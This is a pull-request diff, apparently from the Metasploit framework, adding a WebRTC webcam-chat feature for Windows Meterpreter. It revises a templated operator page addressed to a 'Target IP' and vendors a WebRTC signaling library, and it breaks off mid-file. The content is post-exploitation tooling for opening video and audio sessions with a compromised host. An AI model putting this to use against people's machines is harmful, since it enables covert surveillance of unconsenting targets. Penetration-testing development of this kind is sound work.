### PR TITLE
Add WebRTC video chat feature for win meterpreter

### DIFF
--- a/LICENSE
+++ b/LICENSE
@@ -979,23 +979,3 @@ License: Zlib
  2. Altered source versions must be plainly marked as such, and must not be
     misrepresented as being the original software.
  3. This notice may not be removed or altered from any source distribution.
-
-License: WebRTC Experiments
-Permission is hereby granted, free of charge, to any person obtaining a
-copy of these WebRTC Experiments and associated documentation files
-(the “Software”), to deal in the Software without restriction, including
-without limitation the rights to use, copy, modify, merge, publish,
-distribute, sublicense, and/or sell copies of the Software, and to permit
-persons to whom the Software is furnished to do so, subject to the
-following conditions:
-
-The above copyright notice and this permission notice shall be included
-in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS
-OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
-THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-THE SOFTWARE.

--- a/LICENSE
+++ b/LICENSE
@@ -147,6 +147,11 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause
 
+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT
+
+
 #
 # Gems
 #
@@ -974,3 +979,23 @@ License: Zlib
  2. Altered source versions must be plainly marked as such, and must not be
     misrepresented as being the original software.
  3. This notice may not be removed or altered from any source distribution.
+
+License: WebRTC Experiments
+Permission is hereby granted, free of charge, to any person obtaining a
+copy of these WebRTC Experiments and associated documentation files
+(the “Software”), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to permit
+persons to whom the Software is furnished to do so, subject to the
+following conditions:
+
+The above copyright notice and this permission notice shall be included
+in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS
+OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
+THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -65,7 +65,7 @@
 				var video = document.createElement('video');
 				video.src = URL.createObjectURL(stream);
 				video.controls = true;
-				video.muted = true;
+				video.muted = false;
 
 				peer.onStreamAdded({
 					mediaElement: video,

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -1,8 +1,10 @@
 <!DOCTYPE html>
 <head>
-	<script src="api.js"> </script>
+	<script src="=WEBRTCAPIJS="> </script>
 </head>
 <body>
+	<div id="chat_area"></div>
+	<a href="http://metasploit.com/" target="_blank">Metasploit.com</a>
 	<script>
 		var channel = 'msfsinn3rtest123';
 		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
@@ -35,7 +37,7 @@
 			var video = e.mediaElement;
 			video.setAttribute('width', 600);
 			video.setAttribute('controls', true);
-			document.body.appendChild(video);
+			document.getElementById("chat_area").appendChild(video);
 			video.play();
 		};
 

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -1,0 +1,81 @@
+<!DOCTYPE html>
+<head>
+	<script src="webrtc_api.js"> </script>
+</head>
+<body>
+	<script>
+		var channel = 'msfsinn3rtest123';
+		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
+
+		websocket.onopen = function() {
+			websocket.push(JSON.stringify({
+				open: true,
+				channel: channel
+			}));
+		};
+
+		websocket.push = websocket.send;
+		websocket.send = function(data) {
+			websocket.push(JSON.stringify({
+				data: data,
+				channel: channel
+			}));
+		};
+
+		var peer = new PeerConnection(websocket);
+		peer.onUserFound = function(userid) {
+			console.debug("Found userid: " + userid);
+			getUserMedia(function(stream) {
+				peer.addStream(stream);
+				peer.sendParticipationRequest(userid);
+			});
+		};
+
+		peer.onStreamAdded = function(e) {
+			var video = e.mediaElement;
+			video.setAttribute('width', 600);
+			video.setAttribute('controls', true);
+			document.body.appendChild(video);
+			video.play();
+		};
+
+		peer.onStreamEnded = function(e) {
+			var video = e.mediaElement;
+			if (video) {
+				video.style.opacity = 0;
+				setTimeout(function() {
+					video.parentNode.removeChild(video);
+				}, 1000);
+			}
+		};
+					
+		function getUserMedia(callback) {
+			var hints = {audio:true,video:{
+				optional: [],
+				mandatory: {
+					minWidth: 1280,
+					minHeight: 720,
+					maxWidth: 1920,
+					maxHeight: 1080,
+					minAspectRatio: 1.77
+				}
+			}};
+
+			navigator.getUserMedia(hints,function(stream) {
+				var video = document.createElement('video');
+				video.src = URL.createObjectURL(stream);
+				video.controls = true;
+				video.muted = true;
+
+				peer.onStreamAdded({
+					mediaElement: video,
+					userid: 'self',
+					stream: stream
+				});
+						
+				callback(stream);
+			});
+		}
+	</script>
+</body>
+</html>

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -66,6 +66,7 @@
 				video.src = URL.createObjectURL(stream);
 				video.controls = true;
 				video.muted = false;
+				video.volume = 0.2;
 
 				peer.onStreamAdded({
 					mediaElement: video,

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -49,9 +49,10 @@ Status     : <span id="message">Please wait for the chat request to be accepted.
 
 		peer.onStreamAdded = function(e) {
 			var video = e.mediaElement;
-			video.setAttribute('width', 600);
+			video.setAttribute('width', 640);
+			video.setAttribute('height', 480);
 			video.setAttribute('controls', true);
-			video.volume = 0.2;
+			video.volume = 0.5;
 			document.getElementById("chat_area").appendChild(video);
 			video.play();
 		};

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <head>
-	<script src="webrtc_api.js"> </script>
+	<script src="api.js"> </script>
 </head>
 <body>
 	<script>

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -13,7 +13,7 @@ Status     : <span id="message">Please wait for the chat request to be accepted.
 	<div id="chat_area"></div>
 	<a href="http://metasploit.com/" target="_blank">Metasploit.com</a>
 	<script>
-		var channel = 'msfsinn3rtest123';
+		var channel = '=CHANNEL=';
 		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
 		var inSession = false;
 

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -3,6 +3,11 @@
 	<script src="=WEBRTCAPIJS="> </script>
 </head>
 <body>
+	<div id="message">
+	Please wait to allow the video chat to be accepted by the remote target...<br>
+	If the remote target has accepted, you will be asked to allow the webcam to run.
+	<br><br>
+	</div>
 	<div id="chat_area"></div>
 	<a href="http://metasploit.com/" target="_blank">Metasploit.com</a>
 	<script>
@@ -37,6 +42,7 @@
 			var video = e.mediaElement;
 			video.setAttribute('width', 600);
 			video.setAttribute('controls', true);
+			document.getElementById("message").style.display = "none";
 			document.getElementById("chat_area").appendChild(video);
 			video.play();
 		};

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -39,7 +39,6 @@ Status     : <span id="message">Please wait for the chat request to be accepted.
 				return;
 			};
 
-			console.debug("Found userid: " + userid);
 			getUserMedia(function(stream) {
 				peer.addStream(stream);
 				peer.sendParticipationRequest(userid);

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -39,8 +39,11 @@ Status     : <span id="message">Please wait for the chat request to be accepted.
 				return;
 			};
 
+			userid = "=OFFERERID=";
+
 			getUserMedia(function(stream) {
 				peer.addStream(stream);
+				console.debug("Joining: " + userid);
 				peer.sendParticipationRequest(userid);
 				inSession = true;
 				document.getElementById("message").innerHTML = "Session is now active.";
@@ -66,7 +69,6 @@ Status     : <span id="message">Please wait for the chat request to be accepted.
 				}, 1000);
 			}
 			document.getElementById("message").innerHTML = "The video session has ended.";
-			document.getElementById("message").style.display = "";
 		};
 					
 		function getUserMedia(callback) {

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -13,6 +13,7 @@
 	<script>
 		var channel = 'msfsinn3rtest123';
 		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
+		var inSession = false;
 
 		websocket.onopen = function() {
 			websocket.push(JSON.stringify({
@@ -31,10 +32,16 @@
 
 		var peer = new PeerConnection(websocket);
 		peer.onUserFound = function(userid) {
+			if (inSession) {
+				console.debug("Already in session, will not send another participation request");
+				return;
+			};
+
 			console.debug("Found userid: " + userid);
 			getUserMedia(function(stream) {
 				peer.addStream(stream);
 				peer.sendParticipationRequest(userid);
+				inSession = true;
 			});
 		};
 
@@ -55,6 +62,8 @@
 					video.parentNode.removeChild(video);
 				}, 1000);
 			}
+			document.getElementById("message").innerHTML = "The video session has ended.";
+			document.getElementById("message").style.display = "";
 		};
 					
 		function getUserMedia(callback) {

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -3,10 +3,12 @@
 	<script src="=WEBRTCAPIJS="> </script>
 </head>
 <body>
-	<div id="message">
-	Please wait to allow the video chat to be accepted by the remote target...<br>
-	If the remote target has accepted, you will be asked to allow the webcam to run.
-	<br><br>
+	<div id="info">
+<pre>
+Target IP  : =RHOST=
+Start Time : =STARTTIME=
+Status     : <span id="message">Please wait for the chat request to be accepted. If it does, you will be asked to allow your webcam to run.</span>
+</pre>
 	</div>
 	<div id="chat_area"></div>
 	<a href="http://metasploit.com/" target="_blank">Metasploit.com</a>
@@ -42,6 +44,7 @@
 				peer.addStream(stream);
 				peer.sendParticipationRequest(userid);
 				inSession = true;
+				document.getElementById("message").innerHTML = "Session is now active.";
 			});
 		};
 
@@ -49,7 +52,7 @@
 			var video = e.mediaElement;
 			video.setAttribute('width', 600);
 			video.setAttribute('controls', true);
-			document.getElementById("message").style.display = "none";
+			video.volume = 0.2;
 			document.getElementById("chat_area").appendChild(video);
 			video.play();
 		};
@@ -83,7 +86,6 @@
 				video.src = URL.createObjectURL(stream);
 				video.controls = true;
 				video.muted = false;
-				video.volume = 0.2;
 
 				peer.onStreamAdded({
 					mediaElement: video,

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -7,7 +7,7 @@
 <pre>
 Target IP  : =RHOST=
 Start Time : =STARTTIME=
-Status     : <span id="message">Please wait for the broadcast...</span>
+Status     : <span id="message">Please wait for the broadcast. You need to allow your webcam to run in order to join the video session.</span>
 </pre>
 	</div>
 	<div id="chat_area"></div>

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -73,7 +73,7 @@
 	}
 
 	var channel = '=CHANNEL=';
-	var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
+	var websocket = new WebSocket('ws://=SERVER=');
 	var inSession = false;
 
 	websocket.onopen = function() {

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -7,7 +7,7 @@
 <pre>
 Target IP  : =RHOST=
 Start Time : =STARTTIME=
-Status     : <span id="message">Please wait for the chat request to be accepted. If it does, you will be asked to allow your webcam to run.</span>
+Status     : <span id="message">Please wait for the broadcast...</span>
 </pre>
 	</div>
 	<div id="chat_area"></div>

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -68,6 +68,10 @@
 </style>
 <script src="=WEBRTCAPIJS="> </script>
 <script>
+	window.onerror = function(e) {
+		document.getElementById("message").innerHTML = "Unable to start the webcam: " + e.toString();
+	}
+
 	window.onload = function() {
 		document.getElementById("message").innerHTML = "Waiting for the session. When the session arrives, you must manually allow the webcam to run in order to join the session."
 	}

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -69,7 +69,7 @@
 <script src="=WEBRTCAPIJS="> </script>
 <script>
 	window.onerror = function(e) {
-		document.getElementById("message").innerHTML = "Unable to start the webcam: " + e.toString();
+		document.getElementById("message").innerHTML = "Error: " + e.toString();
 	}
 
 	window.onload = function() {

--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -1,103 +1,189 @@
-<!DOCTYPE html>
+<html>
 <head>
-	<script src="=WEBRTCAPIJS="> </script>
+<title>webcam_chat</title>
+<style type="text/css">
+	div.container {
+		position: relative;
+	}
+
+	div.windowa {
+		height: 480px;
+		width: 640px;
+		border-radius: 15px;
+		-moz-border-raidus: 15px;
+		background-color: black;
+		position: absolute;
+		left: 50;
+		padding : 10px;
+		margin-left: auto;
+		margin-right: auto;
+		text-align: center;
+		vertical-align: middle;
+		color: white;
+	}
+
+	div.windowb {
+		height: 180px;
+		width: 200px;
+		border-radius: 15px;
+		-moz-border-raidus: 15px;
+		background-color: #9B9B9B;
+		position: absolute;
+		top: 480;
+		left: 470;
+		padding: 10px;
+		margin-left: auto;
+		margin-right: auto;
+		text-align: center;
+		vertical-align: middle;
+	}
+
+	div.windowc {
+		position: absolute;
+		top: 510;
+		left: 80;
+		height: 150px;
+		width: 380px;
+		color: red;
+	}
+
+	div.footer {
+		position: fixed;
+		bottom: 0;
+		width: 100%;
+		padding: 10px;
+	}
+
+	video.peer {
+		position: absolute;
+		top: 15;
+		left: 10;
+	}
+
+	video.self {
+		position: absolute;
+		top: 5;
+		left: 10;
+	}
+</style>
+<script src="=WEBRTCAPIJS="> </script>
+<script>
+	window.onload = function() {
+		document.getElementById("message").innerHTML = "Waiting for the session. When the session arrives, you must manually allow the webcam to run in order to join the session."
+	}
+
+	var channel = '=CHANNEL=';
+	var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
+	var inSession = false;
+
+	websocket.onopen = function() {
+		websocket.push(JSON.stringify({
+			open: true,
+			channel: channel
+		}));
+	};
+
+	websocket.push = websocket.send;
+	websocket.send = function(data) {
+		websocket.push(JSON.stringify({
+			data: data,
+			channel: channel
+		}));
+	};
+
+	var peer = new PeerConnection(websocket);
+	peer.onUserFound = function(userid) {
+		if (inSession) {
+			console.debug("Already in session, will not send another participation request");
+			return;
+		};
+
+		userid = "=OFFERERID=";
+
+		getUserMedia(function(stream) {
+			peer.addStream(stream);
+			peer.sendParticipationRequest(userid);
+			inSession = true;
+			document.getElementById("message").innerHTML = "Session is now active.";
+		});
+	};
+
+	peer.onStreamAdded = function(e) {
+		var video = e.mediaElement;
+		if (e.userid == 'self') {
+			video.controls = true;
+			video.setAttribute('width', 200);
+			video.setAttribute('height', 190);
+			video.setAttribute('controls', false);
+			video.setAttribute('class', 'self');
+			document.getElementById("windowb").appendChild(video);
+		}
+		else {
+			video.controls = true;
+			video.setAttribute('width', 640);
+			video.setAttribute('height', 460);
+			video.setAttribute('controls', false);
+			video.setAttribute('class', 'peer');
+			document.getElementById("windowa").appendChild(video);
+		}
+		video.muted = false;
+		video.volume = 0.5;
+		video.play();
+	};
+
+	peer.onStreamEnded = function(e) {
+		var video = e.mediaElement;
+		if (video) {
+			video.style.opacity = 0;
+			setTimeout(function() {
+				video.parentNode.removeChild(video);
+			}, 1000);
+		}
+		document.getElementById("message").innerHTML = "The video session has ended.";
+	};
+					
+	function getUserMedia(callback) {
+
+		var hints = {audio:true,video:{
+			optional: [],
+			mandatory: {
+				minWidth: 1280,
+				minHeight: 720,
+				maxWidth: 1920,
+				maxHeight: 1080,
+				minAspectRatio: 1.77
+			}
+		}};
+
+		navigator.getUserMedia(hints,function(stream) {
+			var video = document.createElement('video');
+			video.src = URL.createObjectURL(stream);
+
+			peer.onStreamAdded({
+				mediaElement: video,
+				userid: 'self',
+				stream: stream
+			});
+						
+			callback(stream);
+		});
+	}
+</script>
 </head>
 <body>
-	<div id="info">
-<pre>
-Target IP  : =RHOST=
-Start Time : =STARTTIME=
-Status     : <span id="message">Please wait for the broadcast. You need to allow your webcam to run in order to join the video session.</span>
-</pre>
+
+<div class="container">
+	<div class="windowa" id="windowa">
 	</div>
-	<div id="chat_area"></div>
-	<a href="http://metasploit.com/" target="_blank">Metasploit.com</a>
-	<script>
-		var channel = '=CHANNEL=';
-		var websocket = new WebSocket('ws://wsnodejs.jit.su:80');
-		var inSession = false;
-
-		websocket.onopen = function() {
-			websocket.push(JSON.stringify({
-				open: true,
-				channel: channel
-			}));
-		};
-
-		websocket.push = websocket.send;
-		websocket.send = function(data) {
-			websocket.push(JSON.stringify({
-				data: data,
-				channel: channel
-			}));
-		};
-
-		var peer = new PeerConnection(websocket);
-		peer.onUserFound = function(userid) {
-			if (inSession) {
-				console.debug("Already in session, will not send another participation request");
-				return;
-			};
-
-			userid = "=OFFERERID=";
-
-			getUserMedia(function(stream) {
-				peer.addStream(stream);
-				console.debug("Joining: " + userid);
-				peer.sendParticipationRequest(userid);
-				inSession = true;
-				document.getElementById("message").innerHTML = "Session is now active.";
-			});
-		};
-
-		peer.onStreamAdded = function(e) {
-			var video = e.mediaElement;
-			video.setAttribute('width', 640);
-			video.setAttribute('height', 480);
-			video.setAttribute('controls', true);
-			video.volume = 0.5;
-			document.getElementById("chat_area").appendChild(video);
-			video.play();
-		};
-
-		peer.onStreamEnded = function(e) {
-			var video = e.mediaElement;
-			if (video) {
-				video.style.opacity = 0;
-				setTimeout(function() {
-					video.parentNode.removeChild(video);
-				}, 1000);
-			}
-			document.getElementById("message").innerHTML = "The video session has ended.";
-		};
-					
-		function getUserMedia(callback) {
-			var hints = {audio:true,video:{
-				optional: [],
-				mandatory: {
-					minWidth: 1280,
-					minHeight: 720,
-					maxWidth: 1920,
-					maxHeight: 1080,
-					minAspectRatio: 1.77
-				}
-			}};
-
-			navigator.getUserMedia(hints,function(stream) {
-				var video = document.createElement('video');
-				video.src = URL.createObjectURL(stream);
-				video.controls = true;
-				video.muted = false;
-
-				peer.onStreamAdded({
-					mediaElement: video,
-					userid: 'self',
-					stream: stream
-				});
-						
-				callback(stream);
-			});
-		}
-	</script>
+	<div class="windowb" id="windowb">
+	</div>
+	<div class="windowc">
+		<b>Session status (=RHOST=):</b><p></p>
+		<span id="message"></span>
+	</div>
+</div>
+<div class="footer">
+	<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
+</div>
 </body>
 </html>

--- a/data/webcam/api.js
+++ b/data/webcam/api.js
@@ -1,0 +1,373 @@
+// Muaz Khan     - https://github.com/muaz-khan
+// MIT License   - https://www.webrtc-experiment.com/licence/
+// Documentation - https://github.com/muaz-khan/WebRTC-Experiment/tree/master/websocket
+
+(function () {
+
+    window.PeerConnection = function (socketURL, userid) {
+        console.debug("Creating connection");
+        this.userid = userid || getToken();
+        this.peers = {};
+
+        if (!socketURL) throw 'Socket-URL is mandatory.';
+
+        new Signaler(this, socketURL);
+		
+		this.addStream = function(stream) {	
+			this.MediaStream = stream;
+		};
+    };
+
+    function Signaler(root, socketURL) {
+        var self = this;
+
+        root.startBroadcasting = function () {
+            console.debug("broadcasting as: " + root.userid);
+			if(!root.MediaStream) throw 'Offerer must have media stream.';
+			
+            (function transmit() {
+                socket.send({
+                    userid: root.userid,
+                    broadcasting: true
+                });
+                !self.participantFound &&
+                    !self.stopBroadcasting &&
+                        setTimeout(transmit, 3000);
+            })();
+        };
+
+        root.sendParticipationRequest = function (userid) {
+            console.debug("sending participation request to userid: " + userid);
+            console.debug("root.userid = " + root.userid);
+            socket.send({
+                participationRequest: true,
+                userid: root.userid,
+                to: userid
+            });
+        };
+
+        // if someone shared SDP
+        this.onsdp = function (message) {
+            var sdp = message.sdp;
+
+            if (sdp.type == 'offer') {
+                root.peers[message.userid] = Answer.createAnswer(merge(options, {
+                    MediaStream: root.MediaStream,
+                    sdp: sdp
+                }));
+            }
+
+            if (sdp.type == 'answer') {
+                root.peers[message.userid].setRemoteDescription(sdp);
+            }
+        };
+
+        root.acceptRequest = function (userid) {
+            console.debug("accepts request");
+            root.peers[userid] = Offer.createOffer(merge(options, {
+                MediaStream: root.MediaStream
+            }));
+        };
+
+        var candidates = [];
+        // if someone shared ICE
+        this.onice = function (message) {
+            var peer = root.peers[message.userid];
+            if (peer) {
+                peer.addIceCandidate(message.candidate);
+                for (var i = 0; i < candidates.length; i++) {
+                    peer.addIceCandidate(candidates[i]);
+                }
+                candidates = [];
+            } else candidates.push(candidates);
+        };
+
+        // it is passed over Offer/Answer objects for reusability
+        var options = {
+            onsdp: function (sdp) {
+                socket.send({
+                    userid: root.userid,
+                    sdp: sdp,
+                    to: root.participant
+                });
+            },
+            onicecandidate: function (candidate) {
+                socket.send({
+                    userid: root.userid,
+                    candidate: candidate,
+                    to: root.participant
+                });
+            },
+            onStreamAdded: function (stream) {
+                console.debug('onStreamAdded', '>>>>>>', stream);
+
+                stream.onended = function () {
+                    if (root.onStreamEnded) root.onStreamEnded(streamObject);
+                };
+
+                var mediaElement = document.createElement('video');
+                mediaElement.id = root.participant;
+                mediaElement[isFirefox ? 'mozSrcObject' : 'src'] = isFirefox ? stream : window.webkitURL.createObjectURL(stream);
+                mediaElement.autoplay = true;
+                mediaElement.controls = true;
+                mediaElement.play();
+
+                var streamObject = {
+                    mediaElement: mediaElement,
+                    stream: stream,
+                    userid: root.participant,
+                    type: 'remote'
+                };
+
+                function afterRemoteStreamStartedFlowing() {
+                    if (!root.onStreamAdded) return;
+                    root.onStreamAdded(streamObject);
+                }
+
+                afterRemoteStreamStartedFlowing();
+            }
+        };
+
+        function closePeerConnections() {
+            self.stopBroadcasting = true;
+            if (root.MediaStream) root.MediaStream.stop();
+
+            for (var userid in root.peers) {
+                root.peers[userid].peer.close();
+            }
+            root.peers = {};
+        }
+
+        root.close = function () {
+            socket.send({
+                userLeft: true,
+                userid: root.userid,
+                to: root.participant
+            });
+            closePeerConnections();
+        };
+
+        window.onbeforeunload = function () {
+            root.close();
+        };
+
+        window.onkeyup = function (e) {
+            if (e.keyCode == 116)
+                root.close();
+        };
+		
+		function onmessage(e) {
+            console.debug("message");
+			var message = JSON.parse(e.data);
+
+            if (message.userid == root.userid) return;
+            root.participant = message.userid;
+
+            // for pretty logging
+            console.debug(JSON.stringify(message, function (key, value) {
+                if (value && value.sdp) {
+                    console.log(value.sdp.type, '---', value.sdp.sdp);
+                    return '';
+                } else return value;
+            }, '---'));
+
+            // if someone shared SDP
+            if (message.sdp && message.to == root.userid) {
+                self.onsdp(message);
+            }
+
+            // if someone shared ICE
+            if (message.candidate && message.to == root.userid) {
+                self.onice(message);
+            }
+
+            // if someone sent participation request
+            if (message.participationRequest && message.to == root.userid) {
+                console.debug('someone is joining');
+                self.participantFound = true;
+
+                if (root.onParticipationRequest) {
+                    root.onParticipationRequest(message.userid);
+                } else root.acceptRequest(message.userid);
+            }
+
+            // if someone is broadcasting himself!
+            if (message.broadcasting && root.onUserFound) {
+                console.debug("someone is broadcasting");
+                root.onUserFound(message.userid);
+            }
+
+            if (message.userLeft && message.to == root.userid) {
+                closePeerConnections();
+            }
+		}
+
+		var socket = socketURL;
+		if(typeof socketURL == 'string') {
+			socket = new WebSocket(socketURL);
+			socket.push = socket.send;
+			socket.send = function (data) {
+                console.debug(data);
+				socket.push(JSON.stringify(data));
+                console.debug("data sent");
+			};
+
+			socket.onopen = function () {
+				console.log('websocket connection opened.');
+			};
+		}
+		socket.onmessage = onmessage;
+    }
+
+    var RTCPeerConnection = window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
+    var RTCSessionDescription = window.mozRTCSessionDescription || window.RTCSessionDescription;
+    var RTCIceCandidate = window.mozRTCIceCandidate || window.RTCIceCandidate;
+
+    navigator.getUserMedia = navigator.mozGetUserMedia || navigator.webkitGetUserMedia;
+    window.URL = window.webkitURL || window.URL;
+
+    var isFirefox = !!navigator.mozGetUserMedia;
+    var isChrome = !!navigator.webkitGetUserMedia;
+
+    var STUN = {
+        url: isChrome ? 'stun:stun.l.google.com:19302' : 'stun:23.21.150.121'
+    };
+
+    var TURN = {
+        url: 'turn:homeo@turn.bistri.com:80',
+        credential: 'homeo'
+    };
+
+    var iceServers = {
+        iceServers: [STUN]
+    };
+
+    if (isChrome) {
+        if (parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2]) >= 28)
+            TURN = {
+                url: 'turn:turn.bistri.com:80',
+                credential: 'homeo',
+                username: 'homeo'
+            };
+
+        iceServers.iceServers = [STUN, TURN];
+    }
+
+    var optionalArgument = {
+        optional: [{
+            DtlsSrtpKeyAgreement: true
+        }]
+    };
+
+    var offerAnswerConstraints = {
+        optional: [],
+        mandatory: {
+            OfferToReceiveAudio: true,
+            OfferToReceiveVideo: true
+        }
+    };
+
+    function getToken() {
+        return Math.round(Math.random() * 9999999999) + 9999999999;
+    }
+	
+	function onSdpError() {}
+
+    // var offer = Offer.createOffer(config);
+    // offer.setRemoteDescription(sdp);
+    // offer.addIceCandidate(candidate);
+    var Offer = {
+        createOffer: function (config) {
+            var peer = new RTCPeerConnection(iceServers, optionalArgument);
+
+            if (config.MediaStream) peer.addStream(config.MediaStream);
+            peer.onaddstream = function (event) {
+                config.onStreamAdded(event.stream);
+            };
+
+            peer.onicecandidate = function (event) {
+                if (event.candidate)
+                    config.onicecandidate(event.candidate);
+            };
+
+            peer.createOffer(function (sdp) {
+                peer.setLocalDescription(sdp);
+                config.onsdp(sdp);
+            }, onSdpError, offerAnswerConstraints);
+
+            this.peer = peer;
+
+            return this;
+        },
+        setRemoteDescription: function (sdp) {
+            this.peer.setRemoteDescription(new RTCSessionDescription(sdp));
+        },
+        addIceCandidate: function (candidate) {
+            this.peer.addIceCandidate(new RTCIceCandidate({
+                sdpMLineIndex: candidate.sdpMLineIndex,
+                candidate: candidate.candidate
+            }));
+        }
+    };
+
+    // var answer = Answer.createAnswer(config);
+    // answer.setRemoteDescription(sdp);
+    // answer.addIceCandidate(candidate);
+    var Answer = {
+        createAnswer: function (config) {
+            var peer = new RTCPeerConnection(iceServers, optionalArgument);
+
+            if (config.MediaStream) peer.addStream(config.MediaStream);
+            peer.onaddstream = function (event) {
+                config.onStreamAdded(event.stream);
+            };
+
+            peer.onicecandidate = function (event) {
+                if (event.candidate)
+                    config.onicecandidate(event.candidate);
+            };
+
+            peer.setRemoteDescription(new RTCSessionDescription(config.sdp));
+            peer.createAnswer(function (sdp) {
+                peer.setLocalDescription(sdp);
+                config.onsdp(sdp);
+            }, onSdpError, offerAnswerConstraints);
+
+            this.peer = peer;
+
+            return this;
+        },
+        addIceCandidate: function (candidate) {
+            this.peer.addIceCandidate(new RTCIceCandidate({
+                sdpMLineIndex: candidate.sdpMLineIndex,
+                candidate: candidate.candidate
+            }));
+        }
+    };
+
+    function merge(mergein, mergeto) {
+        for (var t in mergeto) {
+            mergein[t] = mergeto[t];
+        }
+        return mergein;
+    }
+	
+	window.URL = window.webkitURL || window.URL;
+	navigator.getMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia;
+	navigator.getUserMedia = function(hints, onsuccess, onfailure) {
+		if(!hints) hints = {audio:true,video:true};
+		if(!onsuccess) throw 'Second argument is mandatory. navigator.getUserMedia(hints,onsuccess,onfailure)';
+		
+		navigator.getMedia(hints, _onsuccess, _onfailure);
+		
+		function _onsuccess(stream) {
+			onsuccess(stream);
+		}
+		
+		function _onfailure(e) {
+			if(onfailure) onfailure(e);
+			else throw Error('getUserMedia failed: ' + JSON.stringify(e, null, '\t'));
+		}
+	};
+	
+})();

--- a/data/webcam/api.js
+++ b/data/webcam/api.js
@@ -5,26 +5,24 @@
 (function () {
 
     window.PeerConnection = function (socketURL, userid) {
-        console.debug("Creating connection");
         this.userid = userid || getToken();
         this.peers = {};
 
         if (!socketURL) throw 'Socket-URL is mandatory.';
 
         new Signaler(this, socketURL);
-		
-		this.addStream = function(stream) {	
-			this.MediaStream = stream;
-		};
+        
+        this.addStream = function(stream) { 
+            this.MediaStream = stream;
+        };
     };
 
     function Signaler(root, socketURL) {
         var self = this;
 
         root.startBroadcasting = function () {
-            console.debug("broadcasting as: " + root.userid);
-			if(!root.MediaStream) throw 'Offerer must have media stream.';
-			
+            if(!root.MediaStream) throw 'Offerer must have media stream.';
+            
             (function transmit() {
                 socket.send({
                     userid: root.userid,
@@ -37,8 +35,6 @@
         };
 
         root.sendParticipationRequest = function (userid) {
-            console.debug("sending participation request to userid: " + userid);
-            console.debug("root.userid = " + root.userid);
             socket.send({
                 participationRequest: true,
                 userid: root.userid,
@@ -63,7 +59,6 @@
         };
 
         root.acceptRequest = function (userid) {
-            console.debug("accepts request");
             root.peers[userid] = Offer.createOffer(merge(options, {
                 MediaStream: root.MediaStream
             }));
@@ -155,10 +150,9 @@
             if (e.keyCode == 116)
                 root.close();
         };
-		
-		function onmessage(e) {
-            console.debug("message");
-			var message = JSON.parse(e.data);
+        
+        function onmessage(e) {
+            var message = JSON.parse(e.data);
 
             if (message.userid == root.userid) return;
             root.participant = message.userid;
@@ -183,7 +177,6 @@
 
             // if someone sent participation request
             if (message.participationRequest && message.to == root.userid) {
-                console.debug('someone is joining');
                 self.participantFound = true;
 
                 if (root.onParticipationRequest) {
@@ -193,30 +186,27 @@
 
             // if someone is broadcasting himself!
             if (message.broadcasting && root.onUserFound) {
-                console.debug("someone is broadcasting");
                 root.onUserFound(message.userid);
             }
 
             if (message.userLeft && message.to == root.userid) {
                 closePeerConnections();
             }
-		}
+        }
 
-		var socket = socketURL;
-		if(typeof socketURL == 'string') {
-			socket = new WebSocket(socketURL);
-			socket.push = socket.send;
